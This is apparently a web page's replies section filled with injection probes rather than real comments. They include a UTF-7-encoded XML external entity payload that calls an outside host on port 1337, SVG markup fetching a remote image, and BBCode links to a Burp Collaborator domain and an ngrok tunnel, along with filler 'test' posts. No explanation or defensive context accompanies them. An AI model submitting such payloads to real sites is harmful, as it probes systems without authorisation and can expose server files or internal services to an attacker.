Replies
-
<?xml version="1.0" encoding="UTF-7"?> +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
-
<!DOCTYPE testingxxe [ <!ENTITY xml "placeholder"> ]> <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"> <image height="30" width="30" xlink:href="https://<EXAMPLE_SERVER>/image.jpeg" /> </svg>
-
> <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"> <image height="30" width="30" xlink:href="https://<EXAMPLE_SERVER>/image.jpeg" /> </svg>"]<!DOCTYPE testingxxe [ <!ENTITY xml "placeholder"> ]> <svg…
-
test
-
test
-
test
-
-
[url="http://"]66a91fs5ps35ubroeoeag0kqehkj88.burpcollaborator.net[/url]
-
-
testtest
-
[url=" http://3ddaa3ee470e.ngrok.io/test.jpg"] 3ddaa3ee470e.ngrok.io/test.jpg[/url]
-
-
testtst
